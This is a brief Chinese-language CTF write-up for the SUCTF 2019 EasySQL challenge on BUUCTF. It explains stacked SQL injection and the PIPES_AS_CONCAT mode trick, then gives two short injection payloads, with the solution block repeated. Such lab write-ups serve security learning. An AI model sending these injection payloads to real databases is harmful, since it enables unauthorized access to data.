[SUCTF 2019]EasySQL 1【BUUCFT】【SQL注入】
- 堆叠注入
- set sql_mode=PIPES_AS_CONCAT;将||视为字符串的连接操作符而非或运算符
- 没有过滤*的时候可以直接注入
解法1
*,1
解法2
1;set sql_mode=PIPES_AS_CONCAT;select 1
解析思路参照 The Chen's repository
解法1
*,1
解法2
1;set sql_mode=PIPES_AS_CONCAT;select 1
解析思路参照 The Chen's repository